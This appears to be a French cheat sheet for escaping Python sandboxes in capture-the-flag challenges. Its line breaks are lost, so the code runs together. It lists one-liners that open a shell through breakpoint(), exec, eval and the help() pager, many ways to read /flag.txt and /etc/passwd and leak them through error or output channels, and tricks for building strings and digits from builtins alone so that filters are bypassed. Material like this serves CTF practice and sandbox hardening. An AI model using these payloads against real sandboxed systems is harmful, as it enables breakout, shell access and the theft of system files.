Bon a savoir
breakpoint() # pdb -> import os; os.system("sh")exec(input()) # import os; os.system("sh")eval(input()) # __import__("os").system("sh")help() # pager less -> !/bin/shhelp() # pager less -> :e/flag.txtassert len(set( [ *open("/flag.txt"), open("/flag.txt").read(), set(open("/flag.txt")).pop() ] )) == 1# vers stderrexit(set(open("/flag.txt")))exit([*open("/flag.txt")])compile(".","/flag.txt","exec")raise Exception(*open("/flag.txt"))# vers stdouthelp([*open("/etc/passwd")][0]) # 1, 2, 3print(*open("/flag.txt"))type("", (), {"__init__": lambda s: print(open("flag.txt").read())})()memoryview(open("flag.txt", "rb").read()).tobytes()# vers stdininput([*open("/etc/passwd")])# https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes#read-file-with-builtins-help-and-licenselicense._Printer__filenames = ['/flag.txt']; license()[license() for _ in [license._Printer__filenames in [['/flag.txt']]]]
Creer des chars & strings
# Normalprint("hello")# echappements hexprint("\x68\x65\x6c\x6c\x6f")# echappements octalprint("\150\145\154\154\157")# points de code unicodeprint("\u0068\u0065\u006c\u006c\u006f")print("\U00000068\U00000065\U0000006c\U0000006c\U0000006f")# Uniquement avec les builtinsprint(().__doc__[56] + ().__doc__[17] + ().__doc__[3] + ().__doc__[3] + ().__doc__[34])print(().__doc__[56].__add__(().__doc__[17].__add__(().__doc__[3].__add__(().__doc__[3].__add__(().__doc__[34])))))print(chr(ord('ʚ')-ord('ȫ'))+chr(ord('ř')-ord('æ'))+chr(ord('ř')-ord('æ'))+chr(ord('ȉ')-ord('ơ')))
Creer des digits
print(10)print(True + True + True + True + True + True + True + True + True + True)print((()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())+(()==()+()==())) # marche aussi avec [] & {} & ...print(((()==())<<(()==())<<(()==())<<(()==()))|((()==())<<(()==()))) # ((1<<1<<1<<1) | (1<<1)) = 8 | 2 = 10print(len(str(...))+str(()))print([[]]>[])print(not[]is[])